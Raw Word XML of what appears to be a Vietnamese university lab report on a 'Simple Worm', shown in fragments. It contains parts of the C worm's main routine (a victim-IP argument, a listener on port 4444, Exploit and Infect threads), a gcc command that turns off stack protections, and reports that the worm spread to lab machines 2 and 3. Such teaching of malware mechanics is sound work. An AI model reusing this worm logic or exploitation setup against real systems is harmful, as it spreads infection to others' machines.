    <w:p w14:paraId="47F3D4D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pthread_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action_thread_1, action_thread_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2;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7039D6E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independent_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thread;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="75F5899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</w:p>
    <w:p w14:paraId="67AB8E6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getting victim IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B83536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argc &gt;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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3823303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.0.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FCB43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ip_victim = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00162325">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>argv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[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519AC22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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        signal = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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39181F8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6D7E361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els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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEDE51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.0.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7ADAB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ip_victim =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10.81.0.8</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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6625176F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3800FAAE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</w:p>
    <w:p w14:paraId="189DBAA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create thread to listen to port 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760D8F0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independent_thread = </w:t>
      </w:r>
      <w:r w:rsidRPr="00162325">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>pthread_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creat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&amp;action_thread_1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, Listen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134BF8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5FA4A30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exploit the victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0FA048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Exploi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ip_victim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500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) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5484D3CE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announce success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BE640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The Exploitation succeeded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10FFA0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CF7625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create thread to infect the victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69856DB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independent_thread = </w:t>
      </w:r>
      <w:r w:rsidRPr="00162325">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>pthread_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creat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&amp;action_thread_2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, Infect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ECFD17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5A47C7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wait for thread to finish</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52484CE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DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>pthread_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joi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action_thread_2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ABA378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announce finish</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F1A73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Finished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  <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="15A99D8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270D6A7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48B9F49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els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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E9999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The Exploitation failed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CB5903E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1C6B6D5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604DB19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3F4A4998" w14:textId="77777777" w:rsidR="00200944" w:rsidRPr="00200944" w:rsidRDefault="00200944" w:rsidP="00200944"/>
    <w:p w14:paraId="343FB054" w14:textId="5444F0D0" w:rsidR="001969AB" w:rsidRDefault="003A6B19" w:rsidP="00BA539D">
      <w:r>
        <w:t xml:space="preserve">Build chương trình: Do có sử dụng hàm </w:t>
      </w:r>
      <w:r w:rsidR="001969AB">
        <w:t xml:space="preserve">pthread nên khi thực hiện build chương trình ta sẽ thực hiện lệnh: </w:t>
      </w:r>
      <w:r w:rsidR="00200944" w:rsidRPr="00200944">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>gcc -mpreferred-stack-boundary=2 -z execstack -fno-stack-protector -pthread -o</w:t>
      </w:r>
      <w:r w:rsidR="00200944">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> c3 c3.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F356AFF" w14:textId="042D7C93" w:rsidR="00BF20B1" w:rsidRDefault="00BF20B1" w:rsidP="00BA539D"/>
    <w:p w14:paraId="6010B4AB" w14:textId="77777777" w:rsidR="00DC081D" w:rsidRDefault="00DC081D" w:rsidP="00BA539D"/>
    <w:p w14:paraId="6F069904" w14:textId="39736312" w:rsidR="003A6B19" w:rsidRDefault="00DB27D2" w:rsidP="00BA539D">
      <w:r>
        <w:t>Thực thi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAC8CAC" w14:textId="2A172667" w:rsidR="00DB27D2" w:rsidRDefault="00DB27D2" w:rsidP="00BA539D">
      <w:r>
        <w:t>Kết quả tại máy 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283F5185" w14:textId="45E9F379" w:rsidR="00DB27D2" w:rsidRDefault="00DB27D2" w:rsidP="00BA539D">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B2E4A37" w14:textId="06EAEDAA" w:rsidR="00200944" w:rsidRDefault="00200944" w:rsidP="00BA539D">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DAC34D9" w14:textId="52745B79" w:rsidR="00200944" w:rsidRDefault="00200944" w:rsidP="00BA539D">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54E60780" w14:textId="77777777" w:rsidR="00200944" w:rsidRDefault="00200944" w:rsidP="00BA539D"/>
    <w:p w14:paraId="4C5FD5E8" w14:textId="7A7A4440" w:rsidR="00DB27D2" w:rsidRDefault="00DB27D2" w:rsidP="00BA539D"/>
    <w:p w14:paraId="47D945CB" w14:textId="4645EA3C" w:rsidR="00DB27D2" w:rsidRDefault="00DB27D2" w:rsidP="00200944">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Chạy </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB27D2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DB27D2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">/c3 10.81.0.7 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3584901A" w14:textId="60B39E51" w:rsidR="00DB27D2" w:rsidRDefault="00200944" w:rsidP="00DB27D2">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30C82F9E" wp14:editId="268B3A3C">
            <wp:extent cx="6119446" cy="609404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0" r="74555" b="47094"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6134764" cy="61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CA095" w14:textId="77777777" w:rsidR="00200944" w:rsidRDefault="00200944">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F42C538" w14:textId="15356F23" w:rsidR="00DB27D2" w:rsidRDefault="00DB27D2" w:rsidP="00DB27D2">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Kết quả tại máy 2:</w:t>
      </w:r>
      <w:r w:rsidR="00200944">
        <w:t xml:space="preserve"> Worm đã lây được máy 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF55F7E" w14:textId="77777777" w:rsidR="00200944" w:rsidRDefault="00200944" w:rsidP="00DB27D2">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05D2D5B7" w14:textId="21456C4F" w:rsidR="00DB27D2" w:rsidRDefault="00200944" w:rsidP="00DB27D2">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F58D874" wp14:editId="25079080">
            <wp:extent cx="6093387" cy="118989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0" r="54832" b="76140"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6142570" cy="119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73CF8" w14:textId="77777777" w:rsidR="00200944" w:rsidRDefault="00200944" w:rsidP="00DB27D2">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1173F0D4" w14:textId="2A6BF389" w:rsidR="00DB27D2" w:rsidRDefault="00DB27D2" w:rsidP="00DB27D2">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Kết quả tại máy 3:</w:t>
      </w:r>
      <w:r w:rsidR="00200944">
        <w:t xml:space="preserve"> Worm đã lây được máy 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6A8638" w14:textId="77777777" w:rsidR="00200944" w:rsidRDefault="00200944" w:rsidP="00DB27D2">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43E5B5D1" w14:textId="0E5BAB20" w:rsidR="00DB27D2" w:rsidRDefault="00200944" w:rsidP="00DB27D2">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DC0B4C4" wp14:editId="074CDAA0">
            <wp:extent cx="6047006" cy="1934308"/>
            <wp:effectExtent l="0" t="0" r="0" b="889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1" r="73624" b="76651"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6084232" cy="194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B8DC2" w14:textId="77777777" w:rsidR="00BF20B1" w:rsidRDefault="00BF20B1" w:rsidP="004F64FD">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72980AFE" w14:textId="77777777" w:rsidR="00BF20B1" w:rsidRDefault="00BF20B1" w:rsidP="004F64FD">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="064F2715" w14:textId="4EFA478F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proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">File </w:t>
      </w:r>
      <w:r w:rsidRPr="004657A2">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004657A2">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>trong</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00F13188" w:rsidRPr="009613E4">
        <w:t>11.ANTT</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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2" w:name="OLE_LINK29"/>
      <w:bookmarkStart w:id="3" w:name="OLE_LINK30"/>
      <w:r>
        <w:t>xây dựng</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3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0"/>
    <w:bookmarkEnd w:id="1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12"/>
      <w:footerReference w:type="default" r:id="rId13"/>
      <w:headerReference w:type="first" r:id="rId14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11B6" w14:textId="77777777" w:rsidR="0070485C" w:rsidRDefault="0070485C" w:rsidP="00572592">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="26E3FF6F" w14:textId="77777777" w:rsidR="0070485C" w:rsidRDefault="0070485C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1EEB6EE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544677">
                            <w:rPr>
                              <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                              <w:sz w:val="20"/>
                            </w:rPr>
                            <w:t>Cơ</w:t>
                          </w:r>
                          <w:proofErr w:type="gramEnd"/>
                          <w:r w:rsidR="00544677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chế hoạt động của mã độc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51EEB6EE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 xml:space="preserve">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544677">
                      <w:rPr>
                        <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>Cơ</w:t>
                    </w:r>
                    <w:proofErr w:type="gramEnd"/>
                    <w:r w:rsidR="00544677">
                      <w:rPr>
                        <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t xml:space="preserve"> chế hoạt động của mã độc</w:t>
                    </w:r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B8D7" w14:textId="77777777" w:rsidR="0070485C" w:rsidRDefault="0070485C" w:rsidP="00572592">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="42C0C1D4" w14:textId="77777777" w:rsidR="0070485C" w:rsidRDefault="0070485C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5FDFCCDF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EC23EE">
      <w:rPr>
        <w:rFonts w:eastAsia="Adobe Gothic Std B"/>
        <w:b/>
        <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
      </w:rPr>
      <w:t>2</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:eastAsia="Adobe Gothic Std B"/>
        <w:b/>
        <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
      </w:rPr>
      <w:t>:</w:t>
    </w:r>
    <w:r w:rsidR="00EC23EE">
      <w:rPr>
        <w:rFonts w:eastAsia="Adobe Gothic Std B"/>
        <w:b/>
        <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
      </w:rPr>
      <w:t xml:space="preserve"> Simple Worm</w:t>
    </w:r>
    <w:r w:rsidR="00162043">
      <w:rPr>
        <w:rFonts w:eastAsia="Adobe Gothic Std B"/>
        <w:b/>
        <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
      </w:rPr>
      <w:tab/>
      <w:t>Nhóm 0</w:t>
    </w:r>
    <w:r w:rsidR="00CD71F1">
      <w:rPr>
        <w:rFonts w:eastAsia="Adobe Gothic Std B"/>
        <w:b/>
        <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF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3E82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0C1D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2325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69AB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32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944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B81"/>
    <w:rsid w:val="002E2CA8"/>
    <w:rsid w:val="002E4123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1FA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673FF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A6B19"/>
    <w:rsid w:val="003A76F4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417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1444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0FB0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06F45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3EBA"/>
    <w:rsid w:val="00536101"/>
    <w:rsid w:val="00541A11"/>
    <w:rsid w:val="00544677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9710E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36E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51FE"/>
    <w:rsid w:val="00696078"/>
    <w:rsid w:val="006A01B0"/>
    <w:rsid w:val="006A2C74"/>
    <w:rsid w:val="006A4903"/>
    <w:rsid w:val="006A5D16"/>
    <w:rsid w:val="006A5E62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126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51F"/>
    <w:rsid w:val="00700632"/>
    <w:rsid w:val="00701517"/>
    <w:rsid w:val="00701D02"/>
    <w:rsid w:val="0070253C"/>
    <w:rsid w:val="00703B44"/>
    <w:rsid w:val="0070485C"/>
    <w:rsid w:val="00706856"/>
    <w:rsid w:val="0070708D"/>
    <w:rsid w:val="007078A5"/>
    <w:rsid w:val="00707FEB"/>
    <w:rsid w:val="00714D6C"/>
    <w:rsid w:val="00715AD4"/>
    <w:rsid w:val="00716559"/>
    <w:rsid w:val="00720373"/>
    <w:rsid w:val="00722283"/>
    <w:rsid w:val="0072540B"/>
    <w:rsid w:val="00725D1E"/>
    <w:rsid w:val="007265C3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101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5063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16FC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92A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7A3"/>
    <w:rsid w:val="00963906"/>
    <w:rsid w:val="00964B1C"/>
    <w:rsid w:val="00965171"/>
    <w:rsid w:val="0096625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18C6"/>
    <w:rsid w:val="00B42EB9"/>
    <w:rsid w:val="00B4482B"/>
    <w:rsid w:val="00B47E39"/>
    <w:rsid w:val="00B47FD8"/>
    <w:rsid w:val="00B50791"/>
    <w:rsid w:val="00B516DF"/>
    <w:rsid w:val="00B52169"/>
    <w:rsid w:val="00B52E29"/>
    <w:rsid w:val="00B52EE2"/>
    <w:rsid w:val="00B53A43"/>
    <w:rsid w:val="00B5445A"/>
    <w:rsid w:val="00B56AFE"/>
    <w:rsid w:val="00B574A5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3F8C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1499"/>
    <w:rsid w:val="00BF20B1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54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49EC"/>
    <w:rsid w:val="00CD71F1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27D2"/>
    <w:rsid w:val="00DB5097"/>
    <w:rsid w:val="00DB59FE"/>
    <w:rsid w:val="00DB62F4"/>
    <w:rsid w:val="00DC081D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5BA8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07D77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3AA4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3EE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72EC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06"/>
    <w:rsid w:val="00F84456"/>
    <w:rsid w:val="00F8653C"/>
    <w:rsid w:val="00F8656D"/>
    <w:rsid w:val="00F86CE9"/>
    <w:rsid w:val="00F87054"/>
    <w:rsid w:val="00F92E2E"/>
    <w:rsid w:val="00F93291"/>
    <w:rsid w:val="00F93BD4"/>
    <w:rsid w:val="00F942F4"/>
    <w:rsid w:val="00F94BF8"/>
    <w:rsid w:val="00F94EFC"/>
    <w:rsid w:val="00F96E43"/>
    <w:rsid w:val="00FA0470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8C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35</cp:revision>
  <cp:lastPrinted>2019-03-26T14:54:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-03-11T04:27:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-02T13:07:00Z</dcterms:modified>
</cp:coreProperties>
</file>